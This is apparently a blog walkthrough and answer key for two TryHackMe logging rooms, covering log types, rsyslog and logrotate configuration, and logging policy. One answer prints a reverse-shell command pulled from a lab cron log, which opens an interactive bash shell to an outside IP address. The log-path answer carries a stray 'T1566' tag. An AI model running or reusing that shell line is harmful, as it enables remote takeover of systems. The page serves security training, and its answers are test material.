We covered an introduction to logging where we discussed the logic of creating logs and why we create logs. Logs are created and generated to track performance, analyze security incidents and to establish a pattern from which future events can be predicted. Logs can be system logs, application logs, security logs, audit logs, server logs and database logs. The process of log management starts with collecting logs, storing them in a central location, parsing the logs and then analyzing using log analysis tools and SIEM as well. This was part of TryHackMe Intro to Logs walkthrough which is part of TryHackMe SOC Level 2 Track.
This post also covers the answers for TryHackMe Log Operations Room.
The Complete Practical Web Application Penetration Testing Course
Highlights
Log files are records of events committed to a file in a list format. They can include all sorts of information about events that happened at a particular time. Every device on the network creates log files, thus giving you a history of what’s been happening.
Logs typically contain five headed-up areas. They are:
- Timestamp –the time of the event.
- Log level – how severe or important the event is.
- Username– who caused the event.
- Service or application – what caused the event.
- Event description – what has happened.
Log file types
Event log–records information about the usage of network traffic and tracks login attempts, application events, and failed password attempts.System log(or syslog) – records operating system events, including startup messages, system changes, shutdowns, and errors and warnings.Server log– contains a record of activities in a text document related to a specific server over a specific period of time.Change log– lists changes made to an application or file.Availability log–tracks uptime, availability, and system performance.Authorization and access log– lists who is accessing applications or files.- Resource log –provides information on connectivity issues and any capacity problems.
Application LogsMessages about specific applications, including status, errors, warnings, etc.Audit LogsActivities related to operational procedures crucial for regulatory compliance.Security LogsSecurity events such as logins, permissions changes, firewall activity, etc.Network LogsNetwork traffic, connections, and other network-related events.Database LogsActivities within a database system, such as queries and updates.Web Server LogsRequests processed by a web server, including URLs, response codes, etc.
Room Answers | TryHackMe Intro to Logs
What is the name of your colleague who left a note on your Desktop?
Perry
What is the full path to the suggested log file for initial investigation?
T1566/var/log/gitlab/nginx/access.logT1566
Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?
web server log
Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?
combined
After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?
stansimon
What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?
10.10.10.101
Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?
/bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”
Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?
24
Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?
hourly
Upon accessing the log viewer URL for unparsed raw log files, what error does “/var/log/websrv-02/rsyslog_cron.log” show when selecting the different filters?
no date field
What is the process of standardising parsed data into a more easily readable and query-able format?
Normalisation
What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?
Enrichment
Room Answers | TryHackMe Log Operations
Which of the given log purposes would be suitable to measure the cost of using a service?
Operational
Which of the given log purposes would be suitable for investigating application logs for enhancement and stability?
Debug
You are a consultant working for a growing startup. As a consultant, you participated in a log configuration planning session. The company you work for is working to get compliant to process payment information. The given question set is being discussed.
Which question’s answer can be “as much as mentioned in the PCI DSS requirements.”?
How much do you need to log
The session continues, and your teammates need your help; they will negotiate for logging budget and operation details. As a consultant, you must remind them of a vital point:
Which requirements are non-negotiable?
operational and security requirements
Your team is working on policies to decide which logs will be stored and which portion will be available for analysis.
Which of the given logging principles would be implemented and improved?
Archiving and Accessibility
Your team implemented a brand new API logging product. One of the team members has been tasked with collecting the logs generated by that new product. The team member reported continuous errors when transferring the logs to the review platform.
In this case, which of the given difficulties occurs?
Process and Archive
As a consultant, you are doing a comprehensive risk assessment and noticed that one of the development teams implemented a custom script to generate logs for an old system, which omits loggings at some phases.
What you would call this? (Mistake or Practice?)
Mistake
Video Walkthrough
